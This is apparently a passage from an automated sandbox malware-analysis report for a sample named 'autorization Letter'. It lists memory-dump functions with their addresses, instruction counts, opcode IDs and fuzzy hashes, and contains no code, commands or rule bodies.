                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a677901e39eae1d1425ac7b6b52d7bb7ce4c3cdb3b8159f86ba15f9575c39a50
                                                                  • Instruction ID: cc04dfa04fa1724cf62d8999a62770a05cd3aa0be831ab9b79277fc0e64d7e5e
                                                                  • Opcode Fuzzy Hash: a677901e39eae1d1425ac7b6b52d7bb7ce4c3cdb3b8159f86ba15f9575c39a50
                                                                  • Instruction Fuzzy Hash: B731BE31E12218DFDB18DFA4E5589AEBBB2FF89301F118469E842B7291DB31AC55CF50
                                                                  Function 058A5C70 Relevance: .1, Instructions: 127COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 68145dd964c76bd77eb4cad1d95c9db79054e5e2abf360b05b2495d5fa2e9192
                                                                  • Instruction ID: 87933ade1bca2b8fcdc2e858ae231d7d9db5f1e3ea2aaba00d9c0034b51015b3
                                                                  • Opcode Fuzzy Hash: 68145dd964c76bd77eb4cad1d95c9db79054e5e2abf360b05b2495d5fa2e9192
                                                                  • Instruction Fuzzy Hash: B0413B31B142989FEB14DB69C898EADBBF6FF49604F1440A9E901EB361DB75DC80CB50
                                                                  Function 058A8620 Relevance: .1, Instructions: 124COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8fefafc872fbc84433b17a788a8d1dbecea74a60a647b756bf75ecc76fe63072
                                                                  • Instruction ID: 80b300089dc806a78f3a0a126c393e89ce45eeb8f7f3cbeacadf51aa1e984963
                                                                  • Opcode Fuzzy Hash: 8fefafc872fbc84433b17a788a8d1dbecea74a60a647b756bf75ecc76fe63072
                                                                  • Instruction Fuzzy Hash: E0414B36A006198FEF26DB68E948AADBBB6FF88314F144165D801F7350DB35AD41CFA0
                                                                  Function 058A4558 Relevance: .1, Instructions: 123COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 37b37b32f9ec4db45b50939578be63eedbc827c1026d21539087ae81709c17fa
                                                                  • Instruction ID: 1706d4f5e1cddd3975cdc4bed1ccbb15bb6bc238dd3779cdec786e8d24bc2c77
                                                                  • Opcode Fuzzy Hash: 37b37b32f9ec4db45b50939578be63eedbc827c1026d21539087ae81709c17fa
                                                                  • Instruction Fuzzy Hash: F7512876A01209AFEF14DF94D594BAEBBB2FF88310F118069E905A7361CBB1AD41CB51
                                                                  Function 058A5837 Relevance: .1, Instructions: 120COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b8c1a2e8bf410c98b8c05fab865a89d7629a8c16ea7c40cb6297bba21a07a97f
                                                                  • Instruction ID: e6e76546c565f3a3d6f02198cd061121dd1c7bea73260f641a7265164ee8b53a
                                                                  • Opcode Fuzzy Hash: b8c1a2e8bf410c98b8c05fab865a89d7629a8c16ea7c40cb6297bba21a07a97f
                                                                  • Instruction Fuzzy Hash: EF51A239A11204AFDB54DF68D894DAEBBB2FF89320B154498F9069B361DB31EC81CF50
                                                                  Function 058A3CD8 Relevance: .1, Instructions: 118COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 57cd48870fcf5b55148f9759177954c8c2032134b9e8506a21cdf44dc4a8e0bd
                                                                  • Instruction ID: 1795e70863c7d22de06f11fec7ce121e1e3ccc0ad22441c997e5d8b02c0c0520
                                                                  • Opcode Fuzzy Hash: 57cd48870fcf5b55148f9759177954c8c2032134b9e8506a21cdf44dc4a8e0bd
                                                                  • Instruction Fuzzy Hash: AB41E935A002198FDB54EBA8C894BEDB7B2BF49704F114069E905EB3A1DB39AC41CB64
                                                                  Function 058A3A38 Relevance: .1, Instructions: 117COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e9d88398e52f352b1f92ee4d4e14747357ca2f9ac84d0282d3006183838c20be
                                                                  • Instruction ID: 923b7572bc54a0447c506081074c65080063b3a07f51e2f0b71cc9000b45977e
                                                                  • Opcode Fuzzy Hash: e9d88398e52f352b1f92ee4d4e14747357ca2f9ac84d0282d3006183838c20be
                                                                  • Instruction Fuzzy Hash: C4417D30A006058FD714DF68D994A9DB7F6FF89305F2088ACD416AB365DB36AC45CB50
                                                                  Function 058A3A48 Relevance: .1, Instructions: 114COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 98e33f6bf46870adc2c3c92d2282b8a64c9461c07775f4a8315221dcf42d9f4f
                                                                  • Instruction ID: 99838ebfd124d3d2a55cb28d07a2bd6d4b83435181235e8ae98acb20b45c6fbd
                                                                  • Opcode Fuzzy Hash: 98e33f6bf46870adc2c3c92d2282b8a64c9461c07775f4a8315221dcf42d9f4f
                                                                  • Instruction Fuzzy Hash: 92413B30A002058FDB18EF68D994ADDB7F6FF89305F60846CD41AAB365DB76AC45CB50
                                                                  Function 058A72C0 Relevance: .1, Instructions: 112COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cee02472dffdcedb3482401700acc4e2b2f34a92cf4643d14a780fa1ba837784
                                                                  • Instruction ID: fab85fe22c26576f7927bd88173172ec4c998f0c440296481f19f16aa7c084e6
                                                                  • Opcode Fuzzy Hash: cee02472dffdcedb3482401700acc4e2b2f34a92cf4643d14a780fa1ba837784
                                                                  • Instruction Fuzzy Hash: 12414632B01219CFDF18DBB9D8846ADBBF2AF48204F144529E906E7391EB749D45CB91
                                                                  Function 058A70D9 Relevance: .1, Instructions: 111COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0d5846e345de12076342147e243d8fb5ebe5aa249f23167c6151d5f368a89db2
                                                                  • Instruction ID: d4a7e14337bfb2a167b806b21b2d45be65c75c30976326d237834ae7d67c000e
                                                                  • Opcode Fuzzy Hash: 0d5846e345de12076342147e243d8fb5ebe5aa249f23167c6151d5f368a89db2
                                                                  • Instruction Fuzzy Hash: 60417C31A0020A8FCB14EFA9D4449AFBBF6FF89304B144569D80AD7355EB30A946CB91
                                                                  Function 058AB150 Relevance: .1, Instructions: 106COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8a4e47e335e60801f52c3a966a4ea203d039b391bf91cfa717bdc7045d9e4a61
                                                                  • Instruction ID: 6444c2a389b9f956915490c80a37170baf7f6911a86ac842690b74f3f0b2506a
                                                                  • Opcode Fuzzy Hash: 8a4e47e335e60801f52c3a966a4ea203d039b391bf91cfa717bdc7045d9e4a61
                                                                  • Instruction Fuzzy Hash: 69415E31A10709CFCB04EF78C4949ADBBB6FF89304F008569E515AB365EB71A946CF81
                                                                  Function 058A4E74 Relevance: .1, Instructions: 105COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5447e72503fde36ecbdc056b110c0855b1b6cc95dbd9a039f6e6a8097a0cd554
                                                                  • Instruction ID: e27c29c0d6e4193b036df25ca9c2032b7793f967d7f5afe051d20c6a81ceb988
                                                                  • Opcode Fuzzy Hash: 5447e72503fde36ecbdc056b110c0855b1b6cc95dbd9a039f6e6a8097a0cd554
                                                                  • Instruction Fuzzy Hash: AD413E31A10709CFCB04EF68C4949EDFBB6FF89304F008569E515AB325EB71A946CB81
                                                                  Function 058A7170 Relevance: .1, Instructions: 103COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 487c01edc6b61bd2f5c6ccac3bf725d531f8b0003ceeaf9de1a4e1af9b0e5970
                                                                  • Instruction ID: 5792f496eb41f7d473ebed7d6da1d913a6c58d0b3d4772a6b8a53f4174c61eb5
                                                                  • Opcode Fuzzy Hash: 487c01edc6b61bd2f5c6ccac3bf725d531f8b0003ceeaf9de1a4e1af9b0e5970
                                                                  • Instruction Fuzzy Hash: 2A416B31A0070ACFCB14DF69D4944AEBBF2FF893147148A6DD81ADB351EB31A946CB91
                                                                  Function 058AB049 Relevance: .1, Instructions: 97COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 57ee4f6254919cc17112b756036c5f554e6ff3abc2f7ec11bb7d4a1c128b96c8
                                                                  • Instruction ID: 6b6cb941ebc16c7223e16a61dd8274bb73a2fc49f580c7319c595c597bd21dda
                                                                  • Opcode Fuzzy Hash: 57ee4f6254919cc17112b756036c5f554e6ff3abc2f7ec11bb7d4a1c128b96c8
                                                                  • Instruction Fuzzy Hash: B531A332B102198FDF04EB78D8548DDB7B6FF89224B144669E906AB320EB71AD45CB90
                                                                  Function 058A8DD9 Relevance: .1, Instructions: 96COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a4fc020d5ab56e60405e702eb97a50c9deca98d513814c2be756f06e05a26b81
                                                                  • Instruction ID: c79a2c5a1df037c1c934833e7435293e4102ad94b4f2baa5223120d299380e8c
                                                                  • Opcode Fuzzy Hash: a4fc020d5ab56e60405e702eb97a50c9deca98d513814c2be756f06e05a26b81
                                                                  • Instruction Fuzzy Hash: 34411775A1020ADFDB44DF68D88499AFBB5FF49310B14C699E818EB315E730A985CFA0
                                                                  Function 058A64F4 Relevance: .1, Instructions: 93COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 18cdf536e3dae7230f9b43e9c38d754b6b9fb119327a5deeeb3d4b7e3fcadd1b
                                                                  • Instruction ID: dd4f6ec18f68f0b520c694cc15f14d27ee8e8b1b011866d987eb8b59b40d21a7
                                                                  • Opcode Fuzzy Hash: 18cdf536e3dae7230f9b43e9c38d754b6b9fb119327a5deeeb3d4b7e3fcadd1b
                                                                  • Instruction Fuzzy Hash: A6318471A00301CBE704EF29D8947557BA2FF98214F088679DC49EB349EF35A894CB60
                                                                  Function 058A8DE8 Relevance: .1, Instructions: 92COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 716437981989d92c50d7ffdac22af6d0cd3ff32ca35ee3f2ed9ba443814e1c4e
                                                                  • Instruction ID: 7a108f48c91a806e64c708b6d19bfd96ab764fe880ec8b3bb31846dffb072d78
                                                                  • Opcode Fuzzy Hash: 716437981989d92c50d7ffdac22af6d0cd3ff32ca35ee3f2ed9ba443814e1c4e
                                                                  • Instruction Fuzzy Hash: B1410575A0020ADFDB44DF68D88499EFBB5FF88310B14C699E918AB315E730A985CF90
                                                                  Function 058A77E1 Relevance: .1, Instructions: 89COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 31842c0be381215a256de37021eca98639af980cc8e03396102bec8a76657024
                                                                  • Instruction ID: afeef6f52920f3ba21c5e64405a2b781fbd014e8baa9d84f66311106d1ca95e3
                                                                  • Opcode Fuzzy Hash: 31842c0be381215a256de37021eca98639af980cc8e03396102bec8a76657024
                                                                  • Instruction Fuzzy Hash: EB31C331A00300CBEB04EF39D8947917BB2FF98214F088679DC09AB349EF34A894CB61
                                                                  Function 058A9364 Relevance: .1, Instructions: 89COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7ff0a750117fad002928883cdf2cd7078a62720a38f6389f89cb24c60a77c1cf
                                                                  • Instruction ID: 05d76b9807ff91ec72e5f612fdfe53288524c3f107f9dcc392b94b789e6aec58
                                                                  • Opcode Fuzzy Hash: 7ff0a750117fad002928883cdf2cd7078a62720a38f6389f89cb24c60a77c1cf
                                                                  • Instruction Fuzzy Hash: AB21B4333542018FE7149B2CC884AA97BE5FF85710B1984B5E50ACF7A6DB76DC04CB90
                                                                  Function 058A5CF6 Relevance: .1, Instructions: 88COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f0b02545e49d16d45c445eb71db911ddd6a5e39625b909b881316ff9e649dd78
                                                                  • Instruction ID: 72f778bb2a5c0fef592d0666f5dbcbc59e6acf88f150bcf42115970fc475d358
                                                                  • Opcode Fuzzy Hash: f0b02545e49d16d45c445eb71db911ddd6a5e39625b909b881316ff9e649dd78
                                                                  • Instruction Fuzzy Hash: 653118367152989FEB14DF69C888EAC7BF6BF49705F1400A9E901EB2A1DB75DC80CB10
                                                                  Function 058A72B1 Relevance: .1, Instructions: 85COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4df1c818429fdaee42243876a02db6c1e9feacc4f7956dc5b3a7ee65d5de05dc
                                                                  • Instruction ID: e260c9f1a06ecd7251100ab7479e1bd897cf57a00fed7e7c025ceccc265032d2
                                                                  • Opcode Fuzzy Hash: 4df1c818429fdaee42243876a02db6c1e9feacc4f7956dc5b3a7ee65d5de05dc
                                                                  • Instruction Fuzzy Hash: 3B317832E01209DFDB18DBB9D8846ADBBB2EF48204F15442AE906E7391EB70AD41CB51
                                                                  Function 058A4548 Relevance: .1, Instructions: 82COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6bfa98a277364eb0c599d04c9dfd8c7e9f7a3cd49671904849f22d7fa70b100b
                                                                  • Instruction ID: 4fa7b7357532e45d013582bbbc26475c593a77ed91ee6e6aca862e1542a3b811
                                                                  • Opcode Fuzzy Hash: 6bfa98a277364eb0c599d04c9dfd8c7e9f7a3cd49671904849f22d7fa70b100b
                                                                  • Instruction Fuzzy Hash: 27312779A01209AFEF14CF94D594BAEBBF2FF88310F158069E905A7365C7B1AD40CB91
                                                                  Function 015DD1FC Relevance: .1, Instructions: 76COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2156624214.00000000015DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015DD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_15dd000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d1930bf314fe5845c2fec1887298fc5812937e2ba3e33980c8d691afebee7e41
                                                                  • Instruction ID: b7670442497ef9b6d8147883c97544408a9c26cea677d80f2db07855e6ef2e25
                                                                  • Opcode Fuzzy Hash: d1930bf314fe5845c2fec1887298fc5812937e2ba3e33980c8d691afebee7e41
                                                                  • Instruction Fuzzy Hash: CC21C472504244DFDB16DF98D9C4B2ABFB5FB88320F24C569E9090E296C33AD416CBA1
                                                                  Function 058A2ACB Relevance: .1, Instructions: 75COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e23710b18759731fdcd821ef74b45ebe5814f9aa2b89587847e308ece40b967a
                                                                  • Instruction ID: cda99c8837ff6718be5f8a3600edc4e7e056d5598e4d69ff2ace06b605670f4c
                                                                  • Opcode Fuzzy Hash: e23710b18759731fdcd821ef74b45ebe5814f9aa2b89587847e308ece40b967a
                                                                  • Instruction Fuzzy Hash: 7F31EF32910B09DECB01AF68D854899F7B1FF99340B118B5AE95967221FB30E6D5CB81
                                                                  Function 058A2AD0 Relevance: .1, Instructions: 74COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f5b79d477ea3630ab7cf73d326b96fd7aec00d883b5a7366a0937c41c07c72d5
                                                                  • Instruction ID: b0ed2bda12b9d53129641d368e4e5f270050fa42de556fe4445c53fda4e2d29d
                                                                  • Opcode Fuzzy Hash: f5b79d477ea3630ab7cf73d326b96fd7aec00d883b5a7366a0937c41c07c72d5
                                                                  • Instruction Fuzzy Hash: 1631F032910B09DECB01AF68D854899F7B1FF99340B118B5AE95967221FB30E6D5CB81
                                                                  Function 058A6FC9 Relevance: .1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 72a83b0578ef415e2c4a1e8507303038e3d2d27d881d1e54357323eafce8505a
                                                                  • Instruction ID: 8aa1277455fd442daa95f5f5cdbe94f3573698133b6e5995fdafdda7c95b88e0
                                                                  • Opcode Fuzzy Hash: 72a83b0578ef415e2c4a1e8507303038e3d2d27d881d1e54357323eafce8505a
                                                                  • Instruction Fuzzy Hash: BF213A313006118FDB689B39C854A6977EAFF85714B1484BDE906CB360DB76EC42CB50
                                                                  Function 058A6FD8 Relevance: .1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a5d60f01104869071861efc923a390e89520dc63c6fbb42f80f8938f72701d82
                                                                  • Instruction ID: a59cac01e34a062afe95e5d60f1ac1fc19b7273d563113c5a797b8189ddcec08
                                                                  • Opcode Fuzzy Hash: a5d60f01104869071861efc923a390e89520dc63c6fbb42f80f8938f72701d82
                                                                  • Instruction Fuzzy Hash: 5D2129313006018FD768AB3DC854A6A73EAEF85714B5484ADE906CB3B4EBB6DC46CB50
                                                                  Function 015ED01C Relevance: .1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2156743573.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_15ed000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6a8bcc0087f6c7d3b841ac30bf9130555293e82d713972688a03a6ed311ef93a
                                                                  • Instruction ID: 9a2d74957c761628659781f076ceb19499310a31590e1f24736e4fb7dc0243df
                                                                  • Opcode Fuzzy Hash: 6a8bcc0087f6c7d3b841ac30bf9130555293e82d713972688a03a6ed311ef93a
                                                                  • Instruction Fuzzy Hash: 9A210071A04204DFCB19DF68D988B26BFF5FB88314F28C969D90A0F256D33AD406CA61
                                                                  Function 015ED1D4 Relevance: .1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2156743573.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_15ed000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f5bba7037e635fd7875e89c1c6d78e7ccb11775886c0062459c3b756efff61f2
                                                                  • Instruction ID: b2e3e94ff4e53a860adca8b1ecd16734c3ffb92c9bade9fa545c5a7d44a15f85
                                                                  • Opcode Fuzzy Hash: f5bba7037e635fd7875e89c1c6d78e7ccb11775886c0062459c3b756efff61f2
                                                                  • Instruction Fuzzy Hash: 1221F575904204DFDB09DFA8D5C8B2ABBF5FB84324F20C9ADD9494F296C33AD406CA61
                                                                  Function 058AE050 Relevance: .1, Instructions: 70COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0188e3231a0a13b0f3e7a1130e72848eab7169a1c3390088c9f9cd9654adbb91
                                                                  • Instruction ID: 4a196aa92da8b46ce4f4f900f4c2ca2be575516539f47ed3cd972878279aee90
                                                                  • Opcode Fuzzy Hash: 0188e3231a0a13b0f3e7a1130e72848eab7169a1c3390088c9f9cd9654adbb91
                                                                  • Instruction Fuzzy Hash: 41215332A106099FDB10EF6CD880999FBB5FF49310B50C66AE958E7200EB31A994CB91
                                                                  Function 058A6CD0 Relevance: .1, Instructions: 70COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8437c43e945204fbb02f7d028a71966d8533363b1b0f1e8266ba19015e32f963
                                                                  • Instruction ID: 9f1af038fe4ef3bdd6d694f5cac47938d278443e25126fba7ba46baac88624a7
                                                                  • Opcode Fuzzy Hash: 8437c43e945204fbb02f7d028a71966d8533363b1b0f1e8266ba19015e32f963
                                                                  • Instruction Fuzzy Hash: 1B210732F003964BEB10DF7EC8406BEBBA2EF85560F0C857AC915D7259E7355D018791
                                                                  Function 058A6D00 Relevance: .1, Instructions: 69COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
